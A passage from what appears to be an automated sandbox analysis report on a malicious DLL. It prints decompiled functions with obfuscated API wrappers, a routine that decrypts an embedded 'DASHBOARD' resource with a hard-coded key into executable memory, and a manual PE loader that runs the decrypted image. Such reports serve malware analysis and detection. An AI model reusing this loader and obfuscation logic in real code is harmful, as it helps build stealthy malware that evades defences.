                                                                                                                                                            				_v8 = 0xf8ae2a;
                                                                                                                                                            				_v8 = _v8 + 0xcab3;
                                                                                                                                                            				_v8 = _v8 * 0x2b;
                                                                                                                                                            				_v8 = _v8 ^ 0x29e0cf29;
                                                                                                                                                            				E0038AA30(0x112, 0x9df7cc0d, __ecx, 0x6fe24f6c);
                                                                                                                                                            				_t25 = DeleteFileW(_a4); // executed
                                                                                                                                                            				return _t25;
                                                                                                                                                            			}








                                                                                                                                                            APIs
                                                                                                                                                            • DeleteFileW.KERNEL32(0CDC4DBA,?,?,?,?), ref: 00381FF5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DeleteFile
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4033686569-0
                                                                                                                                                            • Opcode ID: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                                                            • Instruction ID: c650afb2f802a11bdb76b0f47907f5372ec508b12910bfda7ae09b34d41f6f53
                                                                                                                                                            • Opcode Fuzzy Hash: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                                                            • Instruction Fuzzy Hash: 8EF0F9B190120CFBEF18EFD4D9468AEBFB5EB50304F20819AF40467222E7715F549B91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                            			E00385BFD(intOrPtr __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				unsigned int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                            				void* _t20;
                                                                                                                                                            				struct HINSTANCE__* _t25;
                                                                                                                                                            
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t20);
                                                                                                                                                            				_v16 = _v16 & 0x00000000;
                                                                                                                                                            				_v24 = 0x5faaf9;
                                                                                                                                                            				_v20 = 0xab22cd;
                                                                                                                                                            				_v12 = 0x8e3542;
                                                                                                                                                            				_v12 = _v12 >> 7;
                                                                                                                                                            				_v12 = _v12 ^ 0x00089943;
                                                                                                                                                            				_v8 = 0x9b967a;
                                                                                                                                                            				_v8 = _v8 ^ 0x4689732a;
                                                                                                                                                            				_v8 = _v8 ^ 0x4619bdd7;
                                                                                                                                                            				E0038AA30(0x12d, 0x9df7cc0d, __ecx, 0xf5e9dd1e);
                                                                                                                                                            				_t25 = LoadLibraryW(_a8); // executed
                                                                                                                                                            				return _t25;
                                                                                                                                                            			}











                                                                                                                                                            APIs
                                                                                                                                                            • LoadLibraryW.KERNEL32(00000000), ref: 00385C6D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            • Opcode ID: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                                                            • Instruction ID: 882e3058d24d91c190da8d708d6e3ff7a7826cb75016cae2eca5712e9998a69d
                                                                                                                                                            • Opcode Fuzzy Hash: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                                                            • Instruction Fuzzy Hash: 50F0FFB5C0020CFBCF05EFE4DA46AEEBBB4FB40318F108188E91566212D3B54B58DB91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                            			E0037B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				void* _t27;
                                                                                                                                                            				int _t32;
                                                                                                                                                            
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t27);
                                                                                                                                                            				_v12 = 0x6268;
                                                                                                                                                            				_v12 = _v12 ^ 0x57e834c3;
                                                                                                                                                            				_v12 = _v12 + 0xffff2919;
                                                                                                                                                            				_v12 = _v12 + 0xffff3e3d;
                                                                                                                                                            				_v12 = _v12 ^ 0x57e9dc2b;
                                                                                                                                                            				_v8 = 0xa46433;
                                                                                                                                                            				_v8 = _v8 + 0x98ba;
                                                                                                                                                            				_v8 = _v8 | 0xc390ebe9;
                                                                                                                                                            				_v8 = _v8 + 0xd5b0;
                                                                                                                                                            				_v8 = _v8 ^ 0xc3bab866;
                                                                                                                                                            				E0038AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
                                                                                                                                                            				_t32 = lstrcmpiW(_a16, _a4); // executed
                                                                                                                                                            				return _t32;
                                                                                                                                                            			}








                                                                                                                                                            APIs
                                                                                                                                                            • lstrcmpiW.KERNEL32(EE1E6DE5,57E9DC2B), ref: 0037B2C1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: lstrcmpi
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1586166983-0
                                                                                                                                                            • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                                            • Instruction ID: 990d1e94676dfe5714b5f3eca96472de2481dd2d6cd9bb128b4d258173c82d31
                                                                                                                                                            • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                                            • Instruction Fuzzy Hash: DC011AB2C04708FFDF45DFD4DD468AEBB75EB44304F108189B90566152E3754B609B51
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                            			E00381E67(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                            				void* _t23;
                                                                                                                                                            				int _t29;
                                                                                                                                                            
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t23);
                                                                                                                                                            				_v16 = _v16 & 0x00000000;
                                                                                                                                                            				_v24 = 0x62b4e9;
                                                                                                                                                            				_v20 = 0xc383c4;
                                                                                                                                                            				_v12 = 0x238243;
                                                                                                                                                            				_v12 = _v12 * 0x67;
                                                                                                                                                            				_v12 = _v12 ^ 0x0e4d658b;
                                                                                                                                                            				_v8 = 0x6564d0;
                                                                                                                                                            				_v8 = _v8 ^ 0x2b193590;
                                                                                                                                                            				_v8 = _v8 << 0xd;
                                                                                                                                                            				_v8 = _v8 ^ 0x8a2acb03;
                                                                                                                                                            				E0038AA30(0x23f, 0x9df7cc0d, __ecx, 0x3185251c);
                                                                                                                                                            				_t29 = CloseHandle(_a12); // executed
                                                                                                                                                            				return _t29;
                                                                                                                                                            			}











                                                                                                                                                            APIs
                                                                                                                                                            • CloseHandle.KERNEL32(00C383C4), ref: 00381EE1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                            • Opcode ID: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                                                            • Instruction ID: 21b655460f63d0f9eb26e416a72bd96848b0849aad2e13ef303cb57284890a36
                                                                                                                                                            • Opcode Fuzzy Hash: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                                                            • Instruction Fuzzy Hash: 490128B5C00208FBCF40EFE4D94A99EBFB5EB44308F108499E81567212D7758B14DF91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:16.1%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                            Total number of Nodes:297
                                                                                                                                                            Total number of Limit Nodes:23

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                            			E100125C0(void* __ebx, void* __edi, void* __esi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                            				void* _v8;
                                                                                                                                                            				void* _v12;
                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				short _v22;
                                                                                                                                                            				short _v24;
                                                                                                                                                            				short _v26;
                                                                                                                                                            				short _v28;
                                                                                                                                                            				short _v30;
                                                                                                                                                            				short _v32;
                                                                                                                                                            				short _v34;
                                                                                                                                                            				short _v36;
                                                                                                                                                            				short _v38;
                                                                                                                                                            				char _v40;
                                                                                                                                                            				void* _v44;
                                                                                                                                                            				void* _v48;
                                                                                                                                                            				long _v52;
                                                                                                                                                            				void* _v56;
                                                                                                                                                            				struct HRSRC__* _v60;
                                                                                                                                                            				short _v64;
                                                                                                                                                            				short _v66;
                                                                                                                                                            				short _v68;
                                                                                                                                                            				short _v70;
                                                                                                                                                            				short _v72;
                                                                                                                                                            				short _v74;
                                                                                                                                                            				short _v76;
                                                                                                                                                            				short _v78;
                                                                                                                                                            				short _v80;
                                                                                                                                                            				short _v82;
                                                                                                                                                            				short _v84;
                                                                                                                                                            				short _v86;
                                                                                                                                                            				char _v88;
                                                                                                                                                            				intOrPtr _v92;
                                                                                                                                                            				void* __ebp;
                                                                                                                                                            				signed int _t66;
                                                                                                                                                            				void* _t70;
                                                                                                                                                            				void* _t72;
                                                                                                                                                            				struct HRSRC__* _t74;
                                                                                                                                                            				void* _t78;
                                                                                                                                                            				intOrPtr _t92;
                                                                                                                                                            				void* _t93;
                                                                                                                                                            				void* _t95;
                                                                                                                                                            				intOrPtr _t104;
                                                                                                                                                            				signed int _t120;
                                                                                                                                                            				void* _t121;
                                                                                                                                                            
                                                                                                                                                            				_t119 = __esi;
                                                                                                                                                            				_t118 = __edi;
                                                                                                                                                            				_t96 = __ebx;
                                                                                                                                                            				_t66 =  *0x100545cc; // 0xd853c527
                                                                                                                                                            				_v20 = _t66 ^ _t120;
                                                                                                                                                            				_v92 = _a8;
                                                                                                                                                            				 *0x10055a80 = _a4;
                                                                                                                                                            				_t109 = _a8;
                                                                                                                                                            				 *0x10055a84 = _a8;
                                                                                                                                                            				 *0x10055a88 = _a12;
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				_v52 = 0;
                                                                                                                                                            				_v44 = 0;
                                                                                                                                                            				_v48 = 0;
                                                                                                                                                            				_v12 = 0;
                                                                                                                                                            				_t70 = E10006A90(__eflags); // executed
                                                                                                                                                            				_t131 = _t70;
                                                                                                                                                            				if(_t70 != 0) {
                                                                                                                                                            					_push(0x10046758);
                                                                                                                                                            					E1002FE65(__ebx, _t109, __edi, __esi, __eflags);
                                                                                                                                                            					_t72 = 0;
                                                                                                                                                            				} else {
                                                                                                                                                            					 *0x100530b8 = 0;
                                                                                                                                                            					 *0x100530bc = 0;
                                                                                                                                                            					 *0x100530c0 = 0;
                                                                                                                                                            					 *0x100530c8 = 0;
                                                                                                                                                            					 *0x100530c4 = 0;
                                                                                                                                                            					 *0x100530cc = 0;
                                                                                                                                                            					_v60 = 0;
                                                                                                                                                            					_v56 = 0;
                                                                                                                                                            					_t74 = FindResourceW(_a4, 0x1705, L"DASHBOARD"); // executed
                                                                                                                                                            					_v60 = _t74;
                                                                                                                                                            					_v56 = LoadResource(_a4, _v60);
                                                                                                                                                            					_v52 = SizeofResource(_a4, _v60);
                                                                                                                                                            					_v88 = 0x6b;
                                                                                                                                                            					_v86 = 0x65;
                                                                                                                                                            					_v84 = 0x72;
                                                                                                                                                            					_v82 = 0x6e;
                                                                                                                                                            					_v80 = 0x65;
                                                                                                                                                            					_v78 = 0x6c;
                                                                                                                                                            					_v76 = 0x33;
                                                                                                                                                            					_v74 = 0x32;
                                                                                                                                                            					_v72 = 0x2e;
                                                                                                                                                            					_v70 = 0x64;
                                                                                                                                                            					_v68 = 0x6c;
                                                                                                                                                            					_v66 = 0x6c;
                                                                                                                                                            					_v64 = 0;
                                                                                                                                                            					_v40 = 0x6e;
                                                                                                                                                            					_v38 = 0x74;
                                                                                                                                                            					_v36 = 0x64;
                                                                                                                                                            					_v34 = 0x6c;
                                                                                                                                                            					_v32 = 0x6c;
                                                                                                                                                            					_v30 = 0x2e;
                                                                                                                                                            					_v28 = 0x64;
                                                                                                                                                            					_v26 = 0x6c;
                                                                                                                                                            					_v24 = 0x6c;
                                                                                                                                                            					_v22 = 0;
                                                                                                                                                            					_t78 = E10006A90(_t131); // executed
                                                                                                                                                            					if(_t78 == 0) {
                                                                                                                                                            						_t45 =  &_v88; // 0x6b
                                                                                                                                                            						_t95 = E100048E0(_t45);
                                                                                                                                                            						_t121 = _t121 + 4;
                                                                                                                                                            						_v44 = _t95;
                                                                                                                                                            					}
                                                                                                                                                            					_t47 =  &_v40; // 0x6e
                                                                                                                                                            					_v48 = E100048E0(_t47);
                                                                                                                                                            					 *0x10055a7c = E100053D0(_v44, 0x6c705b40);
                                                                                                                                                            					 *0x10055a78 = E100053D0(_v44, 0x531ff383);
                                                                                                                                                            					_t133 =  *0x10055a78;
                                                                                                                                                            					if( *0x10055a78 == 0) {
                                                                                                                                                            						__eflags = 0x2000;
                                                                                                                                                            						_v12 = VirtualAlloc(0, _v52, 0x00002000 -  *0x100530cc | 0x00001000, 0x40);
                                                                                                                                                            					} else {
                                                                                                                                                            						_t93 =  *0x10055a78(0xffffffff, 0, _v52, 0x3000, 0x40, 0); // executed
                                                                                                                                                            						_v12 = _t93;
                                                                                                                                                            					}
                                                                                                                                                            					E1002FB00(_t96, _t118, _t119, _v12, _v56, _v52);
                                                                                                                                                            					_t104 =  *0x100530b4; // 0x2795
                                                                                                                                                            					_v16 = E1002F9A6(_t96, _v56, _t118, _t119, _t104);
                                                                                                                                                            					E10002970(_t133, _v16, "6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0", 0x24);
                                                                                                                                                            					_t109 = _v16;
                                                                                                                                                            					E10003EE0(_v16, _v12, _v52);
                                                                                                                                                            					_t92 = E100026A0(0x10055a64, _v12, _v52); // executed
                                                                                                                                                            					 *0x10055a8c = _t92;
                                                                                                                                                            					_t72 = 1;
                                                                                                                                                            				}
                                                                                                                                                            				return E1002F81E(_t72, _t96, _v20 ^ _t120, _t109, _t118, _t119);
                                                                                                                                                            			}

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                                                            • _printf.LIBCMT ref: 1001265F
                                                                                                                                                            • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                                                            • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                                                            • _malloc.LIBCMT ref: 100127F5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 0000000B.00000002.532295709.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532368497.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532385736.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532394465.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532402551.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                                                            • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                                                            • API String ID: 572389289-2839844625
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph (function 10002280; legend: Executed / Not Executed; graph not reproduced)
                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                            			E10002280(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                            				void* _v8;
                                                                                                                                                            				void* _v12;
                                                                                                                                                            				signed short* _v16;
                                                                                                                                                            				void* _v20;
                                                                                                                                                            				void* _v24;
                                                                                                                                                            				long _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                            				char _v68;
                                                                                                                                                            				void* _v72;
                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                            				intOrPtr* _v80;
                                                                                                                                                            				intOrPtr _v84;
                                                                                                                                                            				void* _v88;
                                                                                                                                                            				intOrPtr _v92;
                                                                                                                                                            				intOrPtr _v96;
                                                                                                                                                            				intOrPtr _v100;
                                                                                                                                                            				void* _t180;
                                                                                                                                                            				void* _t191;
                                                                                                                                                            				void* _t198;
                                                                                                                                                            				void* _t202;
                                                                                                                                                            				intOrPtr _t209;
                                                                                                                                                            				void* _t220;
                                                                                                                                                            				intOrPtr _t269;
                                                                                                                                                            				intOrPtr _t278;
                                                                                                                                                            				intOrPtr _t326;
                                                                                                                                                            
                                                                                                                                                            				_v100 = __ecx;
                                                                                                                                                            				_v72 = 0;
                                                                                                                                                            				_v20 = 0;
                                                                                                                                                            				if(E10001990(_v100, _a8, 0x40) != 0) {
                                                                                                                                                            					_v16 = _a4;
                                                                                                                                                            					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
                                                                                                                                                            						_t10 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                                                            						if(E10001990(_v100, _a8,  *_t10 + 0xf8) != 0) {
                                                                                                                                                            							_t15 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                                                            							_v80 = _a4 +  *_t15;
                                                                                                                                                            							if( *_v80 == 0x4550) {
                                                                                                                                                            								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
                                                                                                                                                            									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
                                                                                                                                                            										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                            										_v32 =  *(_v80 + 0x38);
                                                                                                                                                            										_v12 = 0;
                                                                                                                                                            										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
                                                                                                                                                            											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
                                                                                                                                                            												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
                                                                                                                                                            											} else {
                                                                                                                                                            												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
                                                                                                                                                            											}
                                                                                                                                                            											if(_v88 > _v20) {
                                                                                                                                                            												_v20 = _v88;
                                                                                                                                                            											}
                                                                                                                                                            											_v12 = _v12 + 1;
                                                                                                                                                            											_v84 = _v84 + 0x28;
                                                                                                                                                            										}
                                                                                                                                                            										__imp__GetNativeSystemInfo( &_v68); // executed
                                                                                                                                                            										_t59 = _v64 - 1; // 0x71
                                                                                                                                                            										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _t59 &  !(_v64 - 1);
                                                                                                                                                            										_t65 = _v64 - 1; // -1
                                                                                                                                                            										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
                                                                                                                                                            											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
                                                                                                                                                            											_v24 = _t180;
                                                                                                                                                            											if(_v24 != 0) {
                                                                                                                                                            												L26:
                                                                                                                                                            												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
                                                                                                                                                            												if(_v72 != 0) {
                                                                                                                                                            													 *((intOrPtr*)(_v72 + 4)) = _v24;
                                                                                                                                                            													asm("sbb edx, edx");
                                                                                                                                                            													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
                                                                                                                                                            													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
                                                                                                                                                            													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
                                                                                                                                                            													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
                                                                                                                                                            													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
                                                                                                                                                            													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
                                                                                                                                                            													if(E10001990(_v100, _a8,  *(_v80 + 0x54)) != 0) {
                                                                                                                                                            														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
                                                                                                                                                            														_v8 = _t191;
                                                                                                                                                            														E10001810(_v8, _v16,  *(_v80 + 0x54));
                                                                                                                                                            														_t115 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                                                            														 *_v72 = _v8 +  *_t115;
                                                                                                                                                            														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
                                                                                                                                                            														_t198 = E100019C0(_v100, _a4, _a8, _v80, _v72); // executed
                                                                                                                                                            														if(_t198 != 0) {
                                                                                                                                                            															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
                                                                                                                                                            															_v76 = _t269;
                                                                                                                                                            															if(_t269 == 0) {
                                                                                                                                                            																 *((intOrPtr*)(_v72 + 0x18)) = 1;
                                                                                                                                                            															} else {
                                                                                                                                                            																 *((intOrPtr*)(_v72 + 0x18)) = E10001EB0(_v100, _v72, _v76);
                                                                                                                                                            															}
                                                                                                                                                            															if(E10001FF0(_v100, _v72) != 0) {
                                                                                                                                                            																_t202 = E10001CB0(_v100, _v72); // executed
                                                                                                                                                            																if(_t202 != 0) {
                                                                                                                                                            																	if(E10001E30(_v100, _v72) != 0) {
                                                                                                                                                            																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
                                                                                                                                                            																			 *(_v72 + 0x2c) = 0;
                                                                                                                                                            																			L49:
                                                                                                                                                            																			return _v72;
                                                                                                                                                            																		}
                                                                                                                                                            																		if( *(_v72 + 0x14) == 0) {
                                                                                                                                                            																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                                                                            																			L47:
                                                                                                                                                            																			goto L49;
                                                                                                                                                            																		}
                                                                                                                                                            																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                                                                            																		_t209 =  *0x10055a88; // 0x0
                                                                                                                                                            																		_t278 =  *0x10055a84; // 0x1
                                                                                                                                                            																		_t326 =  *0x10055a80; // 0x10000000
                                                                                                                                                            																		_v92 = _v96(_t326, _t278, _t209);
                                                                                                                                                            																		if(_v92 != 0) {
                                                                                                                                                            																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
                                                                                                                                                            																			goto L47;
                                                                                                                                                            																		}
                                                                                                                                                            																		SetLastError(0x45a);
                                                                                                                                                            																		L50:
                                                                                                                                                            																		E10002840(_v100, _v72);
                                                                                                                                                            																		return 0;
                                                                                                                                                            																	}
                                                                                                                                                            																	goto L50;
                                                                                                                                                            																}
                                                                                                                                                            																goto L50;
                                                                                                                                                            															}
                                                                                                                                                            															goto L50;
                                                                                                                                                            														}
                                                                                                                                                            														goto L50;
                                                                                                                                                            													}
                                                                                                                                                            													goto L50;
                                                                                                                                                            												}
                                                                                                                                                            												VirtualFree(_v24, 0, 0x8000);
                                                                                                                                                            												SetLastError(0xe);
                                                                                                                                                            												return 0;
                                                                                                                                                            											}
                                                                                                                                                            											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
                                                                                                                                                            											_v24 = _t220;
                                                                                                                                                            											if(_v24 != 0) {
                                                                                                                                                            												goto L26;
                                                                                                                                                            											}
                                                                                                                                                            											SetLastError(0xe);
                                                                                                                                                            											return 0;
                                                                                                                                                            										}
                                                                                                                                                            										SetLastError(0xc1);
                                                                                                                                                            										return 0;
                                                                                                                                                            									}
                                                                                                                                                            									SetLastError(0xc1);
                                                                                                                                                            									return 0;
                                                                                                                                                            								}
                                                                                                                                                            								SetLastError(0xc1);
                                                                                                                                                            								return 0;
                                                                                                                                                            							}
                                                                                                                                                            							SetLastError(0xc1);
                                                                                                                                                            							return 0;
                                                                                                                                                            						}
                                                                                                                                                            						return 0;
                                                                                                                                                            					}
                                                                                                                                                            					SetLastError(0xc1);
                                                                                                                                                            					return 0;
                                                                                                                                                            				}
                                                                                                                                                            				return 0;
                                                                                                                                                            			}






























                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                                                            • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 0000000B.00000002.532295709.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532368497.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532385736.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532394465.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532402551.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                            • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                                            • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                                                            • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
